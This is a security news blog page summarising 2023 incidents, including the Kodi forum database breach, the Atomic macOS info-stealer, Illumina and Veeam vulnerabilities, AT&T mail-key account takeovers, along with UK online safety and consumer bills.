Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Telegram
Cyberattacks CyberCrime Data Breach database Kodi MyBB Telegram

Forum Database Sold Online After Kodi Data Breach

 


Hackers have breached the Kodi Foundation's MyBB forum database, stealing user information such as email addresses and private messages which were tried to be sold online. 

In other words, it is an open-source, cross-platform media player, organizer, and streaming suite that includes several third-party options that allow users to access and stream content from a variety of sources as well as customize their experience as they see fit based upon their personal preferences. 

Several months ago, the Kodi Foundation published a statement revealing that it had been breached by hackers. This was after the organization's MyBB forum database, containing user information and private messages, was stolen and sold online. 

To create backups of the databases, the threat actors abused the account by downloading and deleting backups of the databases. The database's nightly full backups were also downloaded, in addition to the existing data backups. A disablement request has now been sent to the account in question. 

The non-profit organization developed Kodi media center, a free and open-source software entertainment hub, and media player. According to a breach notice published on April 8, the Kodi Team learned of unauthorized access after a data dump of its forum user base (MyBB) was offered for sale online. 

The now-defunct Kodi forum had about 401,000 users who posted 3 million messages covering various topics, including video streaming, suggestions, support, sharing upcoming add-ons, and more. Hackers took over the forum database by accessing the admin interface with inactive staff credentials, according to a site statement on Saturday. 

In the aftermath of the breach, the developer has shut down. The forum, which was home to over 3 million posts, is working to perform a global password reset, as it is assumed that “all passwords are compromised” despite being stored in an encrypted format. 

In an update published earlier today, Kodi's administrators informed the community that they are commissioning an updated forum server. As a result, the existing systems do not appear to have been compromised. 

The forum will be redeployed using the latest MyBB version. This comes with a heavy workload required to incorporate custom functional changes and backport security fixes, so a delay of "several days" is to be expected. 

Kodi shares a list of exposed email addresses associated with forum accounts with the Have I Been PWNed data breach notification service. 

Even though these passwords were hashed and salted, Kodi warns that all passwords should be viewed as compromised for the time being. It may be possible that service availability will be affected if the admin team plans a global password reset. 

According to Kodi's release, any sensitive information transmitted to other users through the user-to-user messaging system may have been compromised, along with any sensitive data sent between users. If you previously used the same login and password for a website, you should follow the instructions on that website for resetting your password or changing it. 

On February 15th, 2023, Amius claimed to have sold a database dump on a website under its brand. According to the database, there are 400,314 Kodi forum members, including "several IPTV resellers," listed in the database. 

There is no information regarding the database price as the seller accepted a private offer over Telegram. The Breached forum is one of the largest hacking and data leak forums. It has developed its reputation over the past few years for hosting, leaking, and selling breaches of companies, governments, and various other organizations. 
Read more »
Sensitive data
Binance Deepfakes Malicious actor malware Sensitive data

The Threat of Deepfakes: Hacking Humans

Deepfake technology has been around for a few years, but its potential to harm individuals and organizations is becoming increasingly clear. In particular, deepfakes are becoming an increasingly popular tool for hackers and fraudsters looking to manipulate people into giving up sensitive information or making financial transactions.

One recent example of this was the creation of a deepfake video featuring a senior executive from the cryptocurrency exchange Binance. The video was created by fraudsters with the intention of tricking developers into believing they were speaking with the executive and providing them with access to sensitive information. This kind of CEO fraud can be highly effective, as it takes advantage of the trust that people naturally place in authority figures.

While deepfake technology can be used for more benign purposes, such as creating entertaining videos or improving visual effects in movies, its potential for malicious use is undeniable. This is especially true when it comes to social engineering attacks, where hackers use psychological tactics to convince people to take actions that are not in their best interest.

To prevent deepfakes from being used to "hack the humans", it is important to take a multi-layered approach to security. This includes training employees to be aware of the risks of deepfakes and how to identify them, implementing technical controls to detect and block deepfake attacks, and using threat intelligence to stay ahead of new and emerging threats.

At the same time, it is important to recognize that deepfakes are only one of many tools that hackers and fraudsters can use to target individuals and organizations. To stay protected, it is essential to maintain a strong overall security posture, including regular software updates, strong passwords, and access controls.

The most effective defense against deepfakes and other social engineering attacks is to maintain a healthy dose of skepticism and critical thinking. By being aware of the risks and taking steps to protect yourself and your organization, you can help ensure that deepfakes don't "hack the humans" and cause lasting harm.
Read more »
Vulnerabilities and Exploits
CISA FDA Illumina medical data stolen Security flaw Stolen Data US Government Vulnerabilities and Exploits

Illumina: FDA, CISA Warns Against Security Flaw Making Medical Devices Vulnerable to Remote Hacking


The US Government has issued a warning for healthcare providers and lab employees against a critical flaw, discovered in the genomics giant Illumina’s medical devices, used by threat actors to alter or steal sensitive patient medical data.

On Thursday, US cybersecurity agency CISA and US Food and Drug Administration FDA released separate advisories to alert organizations of the vulnerabilities affecting the Universal Copy Service (UCS) component used by a number of Illumina's genetic sequencing devices.

The vulnerability flaw, identified as CVE-2023-1968 enables remote access to a vulnerable device via the internet without the need for a password. If exploited, hackers may be able to compromise devices and cause them to generate false, changed, or nonexistent results. 

The advisories also include a second vulnerability, CVE-2023-1966, which is rated 7.4 out of 10 for severity. The flaw might provide hackers access to the operating system level, where they could upload and run malicious programs to change settings and access private information on the impacted product.

The FDA claimed it was unaware of any actual attacks that exploited the flaws, but it did issue a warning that a hacker might use them to remotely control a device or change its settings, software, or data, as well as remotely access the user's network.

“On April 5, 2023, Illumina sent notifications to affected customers instructing them to check their instruments and medical devices for signs of potential exploitation of the vulnerability,” states the FDA in its notification. 

The products from Illumina that are vulnerable include iScan, iSeq, MiniSeq, MiSeq, MiSeqDx, NextSeq, and NovaSeq. These products, which are used all around the world in the healthcare industry, are made for clinical diagnostic use when sequencing a person's DNA for different genetic diseases or research needs.

According to Illumina spokesperson David McAlpine, Illumina has “not received any reports indicating that a vulnerability has been exploited, nor do we have any evidence of any vulnerabilities being exploited.” Moreover, he declines to comment on whether the company has technical resources that could detect exploitation, nor did he specify the number of devices affected by the vulnerability.

Illumina CTO Alex Aravanis in a LinkedIn post mentions that the company detected the flaw as part of routine efforts to examine its software for potential flaws and exposures.

“Upon identifying this vulnerability, our team worked diligently to develop mitigations to protect our instruments and customers[…]We then contacted and worked in close partnership with regulators and customers to address the issue with a simple software update at no cost, requiring little to no downtime for most,” Aravanis said.  

Read more »
Vulnerabilities and Exploits
Crypto Wallet Data Safety Security Vulnerabilities and Exploits

This New macOS Info-stealer in Town is Targeting Crypto Wallets

 

A new info-stealer malware has been identified, designed to steal a wide range of personal data, comprising local files, cookies, financial information, and passwords stored in macOS browsers. It's called Atomic macOS Stealer (aka AMOS, or simply Atomic), and its developer is constantly adding new capabilities to it. 

The most recent update was issued on April 25. According to the Cyble research team, Atomic is available on a private Telegram channel for a $1,000 monthly fee. A DMG installer file, a cryptocurrency checker, the brute-forcing program MetaMask, and a web panel to oversee assault campaigns are all provided to the customer.

The malicious DMG file is designed to avoid detection and has been identified as malware by only one (out of 59) AV engines on VirusTotal. When the victim runs this DMG file, it displays a password prompt disguised as a macOS system notice, encouraging the user to input the system password.

After getting the system password, it attempts to steal passwords stored in the default password management tool Keychain. This includes WiFi passwords, credit card information, site logins, and other critical information. Atomic is built with a variety of data-theft features, allowing its operators to target various browsers and crypto wallets, among other things.

It checks the system for installed applications in order to steal information from it. Cryptocurrency wallets (Binance, Electrum, Atomic, and Exodus) and web browsers (Google Chrome, Microsoft Edge, Firefox, Opera, Yandex, and Vivaldi) are among the programs targeted.

It also targets over 50 cryptocurrency wallet extensions, such as Coinbase, Yoroi, BinanceChain, Jaxx Liberty, and Guarda. Furthermore, it attempts to steal system information such as the Model name, RAM size, number of cores, serial number, UUID number, and others.

Atomic is another example of the growing number of cyber dangers threatening macOS. Researchers have already discovered two new threats, the RustBucket Malware and a new LockBit variation, indicating an interest in Apple's core operating system, which powers Mac computers.

As a result, it is past time for Mac users to recognise the growing threat and enhance their security posture.
Read more »
Vulnerability
Cyber Security Cybersecurity Data Backup FIN7 Veeam Backup and Replication Vulnerability

Targeted: Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Hackers Exploit Vulnerable Veeam Backup Servers with FIN7 Tactics

Cyberattacks on vulnerable Veeam backup servers exposed online

Veeam Backup and Replication software is a popular choice for many organizations to protect their critical data. However, recent reports have revealed that hackers are targeting vulnerable Veeam backup servers that are exposed online, leaving organizations at risk of data theft and other cyberattacks. 

There is evidence that at least one group of threat actors, who have been associated with several high-profile ransomware gangs, are targeting Veeam backup servers. 

Starting from March 28th, there have been reported incidents of malicious activity and tools similar to FIN7 attacks being used to exploit a high-severity vulnerability in the Veeam Backup and Replication (VBR) software. 

This vulnerability, tracked as CVE-2023-27532, exposes encrypted credentials stored in the VBR configuration to unauthenticated users, potentially allowing unauthorized access to the backup infrastructure hosts.

The software vendor addressed the vulnerability on March 7 and offered instructions for implementing workarounds. However, on March 23, a pentesting company named Horizon3 released an exploit for CVE-2023-27532, which showed how the credentials could be extracted in plain text using an unsecured API endpoint. 

The exploit also allowed attackers to run code remotely with the highest privileges. Despite the fix, Huntress Labs reported that roughly 7,500 internet-exposed VBR hosts were still susceptible to the vulnerability.

Evidence of FIN7 tactics used in recent attacks

A recent report by cybersecurity and privacy company WithSecure reveals that attacks in late March targeted servers running Veeam Backup and Replication software that was publicly accessible. The techniques used in these attacks were similar to those previously associated with FIN7. 

The researchers deduced that the attacker exploited the CVE-2023-27532 vulnerability, given the timing of the campaign, the presence of open TCP port 9401 on compromised servers, and the vulnerable version of VBR running on the affected hosts. 

During a threat hunt exercise using telemetry data from WithSecure's Endpoint Detection and Response (EDR), the researchers discovered Veeam servers generating suspicious alerts such as sqlservr.exe spawning cmd.exe and downloading PowerShell scripts.

The reason behind the vulnerability is that some organizations use insecure configurations when setting up their Veeam backup servers, making them accessible over the Internet. Hackers can then exploit these weaknesses to gain access to sensitive data and files.

One of the most common attack methods is through brute-force attacks. In this method, hackers use automated tools to try different username and password combinations until they gain access to the Veeam backup server. They can also use other methods like social engineering or spear-phishing to get hold of credentials or trick users into installing malware on their systems.

Once the hackers have gained access, they can steal the backup files, modify or delete them, or use them to launch further attacks on the organization's systems. The impact of such attacks can be severe, causing loss of critical data, disruption to business operations, and significant financial losses.

Mitigating the risk of cyberattacks on Veeam backup servers

To prevent such attacks, organizations need to ensure that their Veeam backup servers are properly secured. This includes configuring the server to only allow access from trusted networks, implementing strong password policies, and keeping the software up-to-date with the latest security patches.

Additionally, organizations should consider implementing multi-factor authentication (MFA) to provide an extra layer of security. MFA requires users to provide more than one form of identification, such as a password and a one-time code sent to their mobile device, making it more difficult for hackers to gain access even if they have obtained login credentials.

Regular security audits and vulnerability assessments can also help identify potential weaknesses and enable organizations to take proactive measures to mitigate them before hackers can exploit them.

Veeam backup servers are a critical component of an organization's data protection strategy, and securing them should be a top priority. Organizations must take necessary steps to ensure that their Veeam backup servers are properly secured and not exposed to the internet. 

By taking these necessary steps, organizations can significantly reduce the risk of a security breach and protect their critical data from falling into the wrong hands. It is always better to be proactive and take preventive measures rather than deal with the aftermath of a cyberattack.


Read more »
Sophos
Crypto Cyber Attacks Encryption Ransomware Attacks. RSA Sophos

The Persistent Threat of Ransomware: RSA Conference 2023 Highlights

The cybersecurity industry's highest-profile annual gathering, the RSA Conference, has focused heavily on the ongoing and increasing threat of ransomware. Last year, 68% of all cyberattacks involved ransomware, according to cybersecurity firm Sophos. 

The National Security Agency's director of cybersecurity, Rob Joyce, recently confirmed that Russian hackers are now weaponizing ransomware to target Ukrainian logistics companies and organizations in Western-allied countries.

Ransomware typically begins with file-encrypting malware being installed on an organization's network, which is then followed by a ransom note displayed on every screen. Hackers demand payment, often in cryptocurrency, to unlock the networks and prevent any data leaks. In recent years, ransomware has affected schools, hospitals, small businesses, and more.

At RSA, conversations have shifted from viewing ransomware as a mere annoyance to a persistent and dangerous threat. A panel on the last day of the conference acted out a hypothetical response to an Iran-backed ransomware attack on US banks in 2025, highlighting the severity of the threat.

The shift in perspective is in response to the increasing sophistication and persistence of ransomware attacks, as well as the fact that cybercriminals have been successful in monetizing their activities. The use of cryptocurrency for payment also makes it more difficult for law enforcement to trace the source of the attacks.

Ransomware attacks are now considered to be a "forever problem," meaning they will be a persistent threat for the foreseeable future. Organizations and individuals must take proactive steps to prevent attacks, including maintaining strong security measures and regularly backing up data. It is also crucial to be vigilant for any suspicious activity and to report any potential attacks immediately to the appropriate authorities.

In conclusion, ransomware attacks continue to be a major concern for cybersecurity professionals, and their impact will only continue to grow. Organizations and individuals must be proactive in their cybersecurity measures to prevent attacks and minimize damage.

Read more »
online currency
AT&T cryptocurrency cyber attack Cyber Attacks online currency

Hackers are Breaking Into AT&T to Steal Cryptocurrency

In recent news, individuals with AT&T email addresses are being targeted by unknown hackers who are using their access to break into victims' cryptocurrency exchange accounts and steal their digital assets. Cryptocurrency exchanges are online platforms that allow users to buy, sell, and trade digital currencies like Bitcoin and Ethereum. 

To use a cryptocurrency exchange, users need to create an account and provide personal information for identity verification. They can then deposit traditional currencies and use them to purchase digital currencies. 

According to an anonymous source, cybercriminals have discovered a way to gain unauthorized access to the email accounts of AT&T users, including those with email domains such as att.net, sbcglobal.net, and bellsouth.net. 

These hackers exploit a section of AT&T's internal network to create mail keys for any user. Mail keys are unique credentials that allow AT&T email users to access their accounts via email applications like Thunderbird or Outlook without using their passwords.

Once the hackers obtain a target's mail key, they use an email app to access the victim's account and reset passwords for more valuable services like cryptocurrency exchanges. This leaves the victim vulnerable, as the hackers can easily reset passwords for Coinbase or Gemini accounts via email, transferring the victim's digital assets to their own accounts and leaving the victim with nothing. 

One of the victims reported that “it is Very frustrating because it is obvious that the ‘hackers’ have direct access to the database or files containing these customer Outlook keys, and the hackers don’t need to know the user’s AT&T website login to access and change these outlook login keys”. 

AT&T spokesperson Jim Kimberly acknowledged the unauthorized creation of secure mail keys that allow access to email accounts without passwords. The company has since updated its security controls and proactively required a password reset on some email accounts. 

“We identified the unauthorized creation of secure mail keys, which can be used in some cases to access an email account without needing a password. We have updated our security controls to prevent this activity. As a precaution, we also proactively required a password reset on some email accounts,” he added. 

However, Kimberly further said that the hackers had no access to the internal systems of the company. “There was no intrusion into any system for this exploit. The bad actors used an API access.”
Read more »
User Privacy
Australia Charity Organisation Data Breach Data Leak Human rights User Privacy

Amnesty International Takes a While to Disclose the Data Breach From December

 

Amnesty International Australia notified supporters via email last Friday that their data might be at risk owing to "anomalous activity" discovered in its IT infrastructure. 

The email was sent extremely late in the day or week, but it was also sent very far after the behaviour was discovered. The email, which Gizmodo Australia saw, claims that the activity was discovered towards the end of last year. 

“As soon as we became aware of this activity on 3 December 2022, we engaged leading external cyber security and forensic IT advisors to determine if any unauthorised access to our IT environment had occurred,” Amnesty International Australia stated.

“We acted quickly to ensure the AIA IT environment was secure and contained, put additional security measures in place and commenced an extensive investigation.” 

Amnesty International said that while it took the organisation some time to notify its supporters of a security breach, the investigation is now complete and has revealed that an unauthorised third party temporarily got access to its IT system. 

“In the course of this investigation, we identified that some low-risk information relating to individuals who made donations in 2019 was accessed, but of low risk of misuse,” the organisation added. 

Although "low risk" information was not defined, it is clear from the security advice that it offered that the data is most likely name, email address, and phone number. Despite being satisfied that the information obtained through the breach won't be used inappropriately, Amnesty International Australia advised its supporters to "carefully scrutinise all emails," "don't answer calls from unknown or private numbers," and "never click on links in SMS messages or social media messages you are not expecting to receive." 

The breach only affected the local arm of the charity, according to Amnesty International Australia, and did not affect any other branches. The statement further stated that although the scope of the "information accessed in the cyber event" did not match the requirements or level for notification under the Notifiable Data Breaches Scheme, Amnesty International Australia had decided to notify its supporters" in the interest of transparency".
Read more »
Wikipedia
BBC Cyber Attacks CyberCrime Cybersecurity Online Protection Wikipedia

Survivors Call for Enhanced Online Protection, Wikipedia Rejects Age Checks

 


A Wikipedia organization has warned that the website could become inaccessible to UK readers if it fails to comply with online safety legislation. 

The Online Safety Bill includes some requirements regarding verification and age-gating. Wikipedia has stated that these measures are incompatible with their open-source nature, which is why the Wikimedia Foundation believes there needs to be a change. As far as their content is concerned, they will not restrict the age range of users. 

Wikimedia's vice president of global advocacy, Rebecca MacKinnon, made the controversial statement to the BBC. In this statement, she stated that such verification would "violate our commitment to collecting minimal data about our readers and contributors" regarding such verification. 

As a result of the law, which will come into force in 2024, companies that offer tech services will be required to ensure users are protected from harmful or illegal content. Furthermore, it requires that services likely to be accessed by children undergo age verification to comply with the law. 

Wikimedia UK says certain Wikipedia material is expected to trigger age verification at some point in the future. This includes content about sexuality that is educational. If one complies with this regulation, it would require reworking a major portion of the technical system.  

A government spokesperson said that these requirements would target only those services with the highest risk to children in terms of safety. Moreover, Wikipedia argues that it is unlikely to fall under the most strict regulations established under the bill. A foundation suggests a similar approach to that used by the EU Digital Services Act, according to the foundation. A centralized moderation model driven by employees and a volunteer community model implemented by Wikipedia can be distinguished from each other by this feature.  

Wikimedia figures worry that the website could be blocked due to non-compliance with the law, while the government has assured them that only high-risk services will be subject to age verification. 

In the interview, Rebecca MacKinnon from the Wikimedia Foundation further stated that the bill would violate the organization's commitment to collecting minimal information about readers and contributors. At present, Wikipedia users have no obligation to provide any information. They do not need to create a profile or verify their identity to access the content. 

Ofcom will enforce the revised regulations on websites that do not comply with them. In addition, it will impose heavy fines for breaking the revised rules. 

It is to combat this issue that Wikipedia is advocating for an 'encyclopedia exemption' under which public goods and knowledge created by the public can be protected from censorship, centralized moderation, and the kind of users that come with centralized content platforms. 

In response to updated legislation that calls for platforms to prevent underage visitors from entering their services, the foundation announced it would not restrict its sites based on their age.  

Despite the government's assurances, only the most high-risk content will be moderated and access may be restricted to those 18 years and older, which only adds to the increased concerns. In the case of Wikipedia, since it is community-run and all the information can be accessed, it will not be governed by large corporations or regulated by governments in the same way as Google.
Read more »
malware
Atomic macOS Malware BleepingComputer Credit Card Stealer Crytocurrency Google Chrome macOS malware

Atomic macOS Malware: New Malware Steals Credit Card Credentials in Chrome


A brand-new malware has apparently been targeting macOS. The malware, according to BleepingComputer, is named “Atomic” and was being sold to cybercriminals in darknet markets for $1,000 a month. 

A victim management UI that is simple to use and gives malicious actors access to very sensitive information, such as keychain passwords, cookies, files from local computers, and other information that may put victims in serious trouble, is provided by this ill-intentioned subscription.

What is Atomic Capable of? 

While Atomic is an information-stealing malware, it can drastically make its quarries much poorer. When cybercriminals buy Atomic, they receive a DMG file with a 64-bit Go-based malware program that can steal credit card information from browsers. This covers Yandex, Opera, Vivaldi, Microsoft Edge, Mozilla Firefox, and Google Chrome. 

After gaining access to a victim's Mac, Atomic may show a bogus password window asking users to enter their system passwords. As a result, attackers can access the target's macOS computer and cause havoc. 

Moreover, due to the activities of Atomic, cryptocurrency holders are particularly vulnerable. More than 50 well-known cryptocurrency extensions, including Metamask and Coinbase, are intended targets of this macOS malware. 

Atomic, unfortunately, has a tendency to go unnoticed. Only one malicious software detection was made by 59 anti-virus scanners. 

How can you Protect Yourself from Atomic macOS Malware? 

Thankfully, Atomic will not be hiding in any official macOS services. Atomic is disseminated by phishing emails, laced torrents, and social media posts by nefarious buyers. Some even use the influence of black SEO to lure Google users into downloading malicious software that poses as legitimate software. 

In case you are a crypto holder, it is best advised to use a well-known crypto hardware wallet in order to protect yourself from digital-asset thieves. Moreover, it has also been advised to not use software wallets, since that way valuable virtual currencies are majorly exposed. 

It has also been recommended to online users to remove their credit card information from Google Chrome by navigating to Settings > Autofill > Payment Methods. Tap on the three-dotted icons next to your credit cards and click on "Turn off virtual card." Go to pay.google.com, select Payment Methods, and then click "Remove" next to your credit cards to take things a step further.  

Read more »
UK
Cyber Security Fake Reviews New Bill Safety Subscription Traps UK

Fake Reviews and Subscription Traps to be Banned Under New Bill in UK

 

As part of the modifications planned under new rules, buying, selling, or hosting bogus reviews would become unlawful. The UK government's new Digital Markets, Competition, and Consumer Bill intends to benefit consumers while increasing competition among large technology corporations. 

The bill, which was filed on Tuesday, prohibits people from obtaining money or free items in exchange for writing flattering reviews. Firms would also be required to notify customers when their free subscription trials expire. Furthermore, the bill seeks to end the current market dominance of the tech titans.

Since 2021, the law has been in the works. Its creators have stated that they want to oversee the way a number of large tech businesses dominate the market - though none have been expressly named yet, and will be chosen following a nine-month assessment phase.

It makes no difference where they are located, and corporations headquartered in China will be included if they are judged to be in scope. The newly established Digital Markets Unit, which will be part of the Competition and Markets Authority (CMA), will thereafter be given special powers to open up a specific market based on the circumstances.

This may involve asking Apple to allow iPhone and iPad users to download apps from various app stores, or compelling search engines to share data. The CMA will be authorized to levy fines of up to 10% of global revenue for non-compliance, depending on the infraction, and will not need a court order to enforce consumer law.

The EU Digital Markets Act was created to address similar competition difficulties with large digital corporations.

The UK bill is fairly broad, and the CMA will have to:
  • deal with the large, worldwide issue of big tech's market dominance 
  • help customers manage subscriptions, and potentially extend the "cooling off" period so they can be stopped after one payment is made 
  • ensure platforms take "reasonable steps" to verify that product and service evaluations are authentic.
After successfully forcing Meta, Facebook's parent company, to sell the graphics animation firm Giphy after ruling that it would harm competition, the CMA demonstrated that a UK regulator can be effective when tackling what are likely to be predominantly US-based behemoths. Meta was disappointed, but it did comply.

According to Reed Smith lawyer Nick Breen, the expanded powers granted to the CMA under the new bill mean that "no one has the luxury of taking this lightly." The trade organization techUK's Neil Ross expressed hope that it would feature "robust checks and balances" as well as a fast appeals mechanism.

"The new laws we're delivering today will empower the CMA to directly enforce consumer law, strengthen competition in digital markets, and ensure that people across the country keep hold of their hard-earned cash," said Business Minister Kevin Hollinrake.

Following parliamentary approval, the new rules will be implemented as soon as possible, according to the Department of Business and Trade.


Read more »
Subscribe to: Comments (Atom)